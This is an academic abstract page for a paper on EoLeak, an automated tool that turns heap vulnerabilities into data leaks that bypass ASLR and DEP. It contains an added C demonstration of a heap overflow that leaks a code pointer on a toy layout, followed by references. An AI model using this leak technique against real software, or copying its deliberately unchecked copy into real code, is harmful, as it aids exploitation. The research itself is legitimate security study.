Exploit-oriented Automated Information Leakage
Author: 杨松涛, 陈凯翔, 王准, 张超 (Yang Songtao, Chen Kaixiang, Wang Zhun, Zhang Chao)

CLC Number: TP311

    Abstract:

    Automated exploit generation (AEG) has become one of the most important ways to demonstrate the exploitability of vulnerabilities. However, state-of-the-art AEG solutions generally assume that the target system has no mitigations deployed, which is not the case on modern operating systems, which often deploy mitigations such as data execution prevention (DEP) and address space layout randomization (ASLR). This paper presents EoLeak, an automated solution that exploits heap vulnerabilities to leak sensitive data and thereby bypasses ASLR and DEP at the same time. At a high level, EoLeak analyzes the program execution trace of the proof-of-concept (PoC) input that triggers the heap vulnerability, characterizes the memory profile from that trace and locates important data (e.g., code pointers), constructs leak primitives that disclose the sensitive data, and, where possible, generates an exploit for the entire process. A prototype of EoLeak is implemented and evaluated on a set of CTF binaries and several real-world applications. The evaluation results show that EoLeak is effective at leaking data and generating exploits.
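    The abstract describes the core step of EoLeak abstractly: find a code pointer that the heap overflow can reach, and turn an ordinary program feature into a leak primitive that discloses it. The following C program is an added illustration of that step and is not code from the paper or from the EoLeak prototype. It assumes a constructed toy layout (a `note` object followed immediately by a `handler` object in one static block, with a zeroed guard after them) so that the overflow is deterministic; a real allocator gives no such adjacency guarantee, and the names `note_write`, `handler_name_echo`, `recover_cb` and `real_handler` are hypothetical. The overflow only has to clobber the NUL terminator of the victim's name; the program's own "echo the name" feature then reads past it and returns the bytes of the adjacent function pointer.

```c
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Attacker-controlled object; the program copies user data into it. */
struct note {
    uint32_t len;
    char     data[28];
};

/* Victim object that sits right after the note. name[] is echoed back to the
 * user as a C string; cb is the code pointer whose disclosure defeats ASLR. */
struct handler {
    char   name[16];
    void (*cb)(void);
};

/* Constructed toy heap: both objects back to back in one static block so the
 * overflow behaves the same on every run. Arranging such adjacency on a real
 * allocator is the heap-layout part of the problem, not shown here. */
struct arena_t {
    struct note    n;
    struct handler h;
    char           guard[16];   /* always zero: the over-read stops here at the latest */
};
static struct arena_t arena;

static void real_handler(void) { /* some callback inside the program image */ }

static void arena_reset(void) {
    memset(&arena, 0, sizeof arena);
    strcpy(arena.h.name, "default");
    arena.h.cb = real_handler;
}

/* The heap overflow the PoC triggers: srclen is never checked against sizeof data.
 * The destination is addressed through the whole arena so the out-of-bounds write
 * is a runtime fact, as it would be for an allocator-backed object. */
static void note_write(const char *src, size_t srclen) {
    char *dst = (char *)&arena + offsetof(struct arena_t, n) + offsetof(struct note, data);
    memcpy(dst, src, srclen);
    arena.n.len = (uint32_t)srclen;
}

/* The program's normal "echo handler name" feature, reused as the leak primitive:
 * once name[] holds no NUL byte, strlen() runs on into cb and the echo returns
 * the pointer bytes too. */
struct leak { size_t nbytes; uint8_t bytes[sizeof(struct handler) + 16]; };

static struct leak handler_name_echo(void) {
    struct leak l;
    const char *name = (const char *)&arena + offsetof(struct arena_t, h);
    l.nbytes = strlen(name);                 /* unbounded read */
    memcpy(l.bytes, name, l.nbytes);
    return l;
}

/* Reassemble the code pointer from whatever leaked beyond name[16].
 * Returns the number of pointer bytes recovered (0 if the leak stopped short). */
static size_t recover_cb(const struct leak *l, uintptr_t *out) {
    const size_t off = offsetof(struct handler, cb);
    if (l->nbytes <= off) return 0;
    size_t n = l->nbytes - off;
    if (n > sizeof(void *)) n = sizeof(void *);
    uintptr_t v = 0;
    for (size_t i = 0; i < n; i++)           /* little-endian reassembly */
        v |= (uintptr_t)l->bytes[off + i] << (8 * i);
    *out = v;
    return n;
}

/* End to end: a payload that fills n.data and all of name[] with non-zero bytes
 * (removing name's terminator), then the echo as the leak. */
static size_t exploit_leak(uintptr_t *leaked_cb) {
    char payload[sizeof arena.n.data + sizeof arena.h.name];
    memset(payload, 'A', sizeof payload);
    arena_reset();
    note_write(payload, sizeof payload);
    struct leak l = handler_name_echo();
    return recover_cb(&l, leaked_cb);
}

/* Ground truth for checking: the real pointer masked to the bytes the leak could
 * reach, since strlen() stops at the pointer's first zero byte (on 64-bit user
 * space at the latest in its two high bytes). */
static uintptr_t cb_prefix(size_t nbytes) {
    uintptr_t v = (uintptr_t)real_handler;
    if (nbytes < sizeof(void *)) v &= ((uintptr_t)1 << (8 * nbytes)) - 1;
    return v;
}

static size_t echo_len_clean(void) { arena_reset(); return handler_name_echo().nbytes; }

static int leak_matches_real_cb(void) {
    uintptr_t v = 0;
    size_t n = exploit_leak(&v);
    return n <= sizeof(void *) && v == cb_prefix(n);
}

int main(void) {
    uintptr_t v = 0;
    size_t n = exploit_leak(&v);
    printf("leaked %zu byte(s) of cb: 0x%" PRIxPTR " (real: 0x%" PRIxPTR ")\n",
           n, v, (uintptr_t)real_handler);
    /* Subtracting the symbol's offset taken from the binary yields the ASLR load base. */
    return 0;
}
```

    Before the overflow the echo returns only the seven bytes of "default"; after it, the recovered value equals the real address of `real_handler` up to the first zero byte of the pointer, which is exactly the information an exploit needs to compute the image base and build a DEP-bypassing ROP chain. Note that the overflow never has to touch cb itself, which is why a leak primitive of this shape survives checks that only guard the pointer's value.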

    Reference
    [1] Liu J, Su PR, Yang M, He L, Zhang Y, Zhu XY, Lin HM. Software and cyber security-A survey. Ruan Jian Xue Bao/Journal of Software, 2018, 29(1):42-68(in Chinese with English abstract). http://www.jos.org.cn/1000-9825/5320.htm[doi:10.13328/j.cnki.jos.005320]
    [2] Zhao SR, Li XJ, Fang Y, Yu YP, Huang WH, Chen K, Su PR, Zhang YQ. A survey on automated exploit generation. Computer Research and Development, 2019, 56(10):2097-2111(in Chinese with English abstract).[doi:10.7544/issn1000-1239.2019.20190655]
    [3] Heelan S. Automatic generation of control flow hijacking exploits for software vulnerabilities[MS. Thesis]. Oxford:University of Oxford, 2009.
    [4] Avgerinos T, Cha SK, Rebert A, Schwartz EJ, Woo M, Brumley D. Automatic exploit generation. Communications of the ACM, 2014, 57(2):74-84.[doi:10.1145/2560217.2560219]
    [5] Cha SK, Avgerinos T, Rebert A, Brumley D. Unleashing mayhem on binary code. In:Proc. of the 2012 IEEE Symp. on Security and Privacy. San Francisco:IEEE, 2012. 380-394.[doi:10.1109/SP.2012.31]
    [6] Schwartz EJ, Avgerinos T, Brumley D. Q:Exploit hardening made easy. In:Proc. of the 20th USENIX Security Symp. San Francisco:USENIX Association, 2011.
    [7] Huang SK, Huang MH, Huang PY, Lai CW, Lu HL, Leong WM. CRAX:Software crash analysis for automatic exploit generation by modeling attacks as symbolic continuations. In:Proc. of the 6th IEEE Int'l Conf. on Software Security and Reliability. Gaithersburg:IEEE, 2012. 78-87.[doi:10.1109/SERE.2012.20]
    [8] Caselden D, Bazhanyuk A, Payer M, Szekeres L, McCamant S, Song D. Transformation-aware exploit generation using a HI-CFG. Technical Report, University of California, Berkeley, Department of Electrical Engineering and Computer Science, 2013.[doi:10.21236/ADA587051]
    [9] Heelan S, Melham T, Kroening D. Automatic heap layout manipulation for exploitation. In:Proc. of the 27th USENIX Security Symp. Baltimore:USENIX Association, 2018. 763-779.
    [10] Heelan S, Melham T, Kroening D. Gollum:Modular and greybox exploit generation for heap overflows in interpreters. In:Proc. of the 2019 ACM SIGSAC Conf. on Computer and Communications Security. London:ACM, 2019. 1689-1706.[doi:10.1145/3319535.3354224]
    [11] Wang Y, Zhang C, Zhao Z, Zhang B, Gong X, Zou W. MAZE:Towards automated heap feng shui. In:Proc. of the 30th USENIX Security Symp. Virtual:USENIX Association, 2021. 1647-1664.
    [12] Wang Y, Zhang C, Xiang X, Zhao Z, Li W, Gong X, Liu B, Chen K, Zou W. Revery:From proof-of-concept to exploitable. In:Proc. of the 2018 ACM SIGSAC Conf. on Computer and Communications Security. Toronto:ACM, 2018. 1914-1927.[doi:10.1145/3243734.3243847]
    [13] Chen W, Zou X, Li G, Qian Z. KOOBE:Towards facilitating exploit generation of kernel out-of-bounds write vulnerabilities. In:Proc. of the 29th USENIX Security Symp. Virtual:USENIX Association, 2020. 1093-1110.
    [14] Wu W, Chen Y, Xu J, Xing X, Gong X, Zou W. FUZE:Towards facilitating exploit generation for kernel use-after-free vulnerabilities. In:Proc. of the 27th USENIX Security Symp. Baltimore:USENIX Association, 2018. 781-797.
    [15] Ning G, Zhang T, Wen W, Mei R. Study of a non-heap-spray IE vulnerability exploitation technique. Netinfo Security, 2014(6):39-42(in Chinese with English abstract).[doi:10.3969/j.issn.1671-1122.2014.06.007]
    [16] van de Ven A. New Security Enhancements in Red Hat Enterprise Linux v.3, update 3. Raleigh:Red Hat, 2004.
    [17] Cowan C, Pu C, Maier D, Walpole J, Bakke P. StackGuard:Automatic adaptive detection and prevention of buffer-overflow attacks. In:Proc. of the 7th USENIX Security Symp. San Antonio:USENIX Association, 1998. 63-78.
    [18] PaX Team. PaX address space layout randomization (ASLR). 2003. http://pax.grsecurity.net/docs/aslr.txt
    [19] Abadi M, Budiu M, Erlingsson U, Ligatti J. Control-flow integrity principles, implementations, and applications. ACM Trans. on Information and System Security, 2009, 13(1):1-40.[doi:10.1145/1609956.1609960]
    [20] Burow N, Carr SA, Nash J, Larsen P, Franz M, Brunthaler S, Payer M. Control-flow integrity:Precision, security, and performance. ACM Computing Surveys, 2017, 50(1):1-33.[doi:10.1145/3054924]
    [21] Tice C, Roeder T, Collingbourne P, Checkoway S, Erlingsson U, Lozano L, Pike G. Enforcing forward-edge control-flow integrity in GCC & LLVM. In:Proc. of the 23rd USENIX Security Symp. San Diego:USENIX Association, 2014. 941-955.
    [22] Brumley D, Poosankam P, Song D, Zheng J. Automatic patch-based exploit generation is possible:Techniques and implications. In:Proc. of the 2008 IEEE Symp. on Security and Privacy. Oakland:IEEE, 2008. 143-157.[doi:10.1109/SP.2008.17]
    [23] Wang M, Su P, Li Q, Ying L, Yang Y, Feng D. Automatic polymorphic exploit generation for software vulnerabilities. In:Zia T, ed. Proc. of the Security and Privacy in Communication Networks. Cham:Springer Int'l Publishing, 2013. 216-233.
    [24] Bao T, Wang R, Shoshitaishvili Y, Brumley D. Your exploit is mine:Automatic shellcode transplant for remote exploits. In:Proc. of the 2017 IEEE Symp. on Security and Privacy. San Jose:IEEE, 2017. 824-839.[doi:10.1109/SP.2017.67]
    [25] Wu W, Chen Y, Xing X, Zou W. KEPLER:Facilitating control-flow hijacking primitive evaluation for Linux kernel vulnerabilities. In:Proc. of the 28th USENIX Security Symp. Santa Clara:USENIX Association, 2019. 1187-1204.
    [26] Fang H, Wu L, Wu Z. Automatic return-to-dl-resolve exploit generation method based on symbolic execution. Computer Science, 2019, 46(2):127-132(in Chinese with English abstract).[doi:10.11896/j.issn.1002-137X.2019.02.020]
    [27] Dolan-Gavitt B, Hodosh J, Hulin P, Leek T, Whelan R. Repeatable reverse engineering with PANDA. In:Proc. of the 5th Program Protection and Reverse Engineering Workshop. Los Angeles:ACM, 2015.[doi:10.1145/2843859.2843867]
    [28] Chen K, Zhang C, Yin T, Chen X, Zhao L. VScape:Assessing and escaping virtual call protections. In:Proc. of the 30th USENIX Security Symp. Virtual:USENIX Association, 2021. 1719-1736.
    [29] Brumley D, Jager I, Avgerinos T, Schwartz EJ. BAP:A binary analysis platform. In:Gopalakrishnan G, ed. Proc. of the Computer Aided Verification. Berlin:Springer, 2011. 463-469.[doi:10.1007/978-3-642-22110-1_37]
    [30] Hu H, Chua ZL, Adrian S, Saxena P, Liang Z. Automatic generation of data-oriented exploits. In:Proc. of the 24th USENIX Security Symp. Washington:USENIX Association, 2015. 177-192.
    [31] Hu H, Shinde S, Adrian S, Chua ZL, Saxena P, Liang Z. Data-oriented programming:On the expressiveness of non-control data attacks. In:Proc. of the 2016 IEEE Symp. on Security and Privacy. San Jose:IEEE, 2016. 969-986.[doi:10.1109/SP.2016.62]
    [32] Ispoglou KK, AlBassam B, Jaeger T, Payer M. Block oriented programming:Automating data-only attacks. In:Proc. of the 2018 ACM SIGSAC Conf. on Computer and Communications Security. Toronto:ACM, 2018. 1868-1882.
    [33] Clause J, Li W, Orso A. Dytan:A generic dynamic taint analysis framework. In:Proc. of the 2007 Int'l Symp. on Software Testing and Analysis. London:ACM, 2007. 196-206.[doi:10.1145/1273463.1273490]
    [34] Kemerlis VP, Portokalidis G, Jee K, Keromytis AD. libdft:Practical dynamic data flow tracking for commodity systems. In:Proc. of the 8th ACM SIGPLAN/SIGOPS Conf. on Virtual Execution Environments. New York:ACM, 2012. 121-132.
    [35] Schwartz EJ, Avgerinos T, Brumley D. All you ever wanted to know about dynamic taint analysis and forward symbolic execution (but might have been afraid to ask). In:Proc. of the 2010 IEEE Symp. on Security and Privacy. Oakland:IEEE, 2010. 317-331.[doi:10.1109/SP.2010.26]
    [36] Chua ZL, Wang Y, Baluta T, Saxena P, Liang Z, Su P. One engine to serve 'em all:Inferring taint rules without architectural semantics. In:Proc. of the Network and Distributed System Security Symp. San Diego:Internet Society, 2019.[doi:10.14722/ndss.2019.23339]
    [37] Song D, Brumley D, Yin H, Caballero J, Jager I, Kang MG, Liang Z, Newsome J, Poosankam P, Saxena P. BitBlaze:A new approach to computer security via binary analysis. In:Sekar R, ed. Proc. of the Information Systems Security. Berlin:Springer, 2008. 1-25.[doi:10.1007/978-3-540-89862-7_1]
    [38] Saudel F, Salwan J. Triton:Concolic execution framework. In:Proc. of the Symp. sur la Sécurité des Technologies de l'Information et des Communications (SSTIC). Rennes, 2015.
    [39] She D, Chen Y, Shah A, Ray B, Jana S. Neutaint:Efficient dynamic taint analysis with neural networks. In:Proc. of the 2020 IEEE Symp. on Security and Privacy. San Francisco:IEEE, 2020. 1527-1543.[doi:10.1109/SP40000.2020.00022]
Citation:

杨松涛, 陈凯翔, 王准, 张超. 面向缓解机制评估的自动化信息泄露方法 (Automated information leakage for the evaluation of mitigation mechanisms). 软件学报 (Journal of Software), 2022, 33(6): 2082-2096
History
  • Received: September 05, 2021
  • Revised: October 15, 2021
  • Online: January 28, 2022
  • Published: June 06, 2022
Copyright: Institute of Software, Chinese Academy of Sciences Beijing ICP No. 05046678-4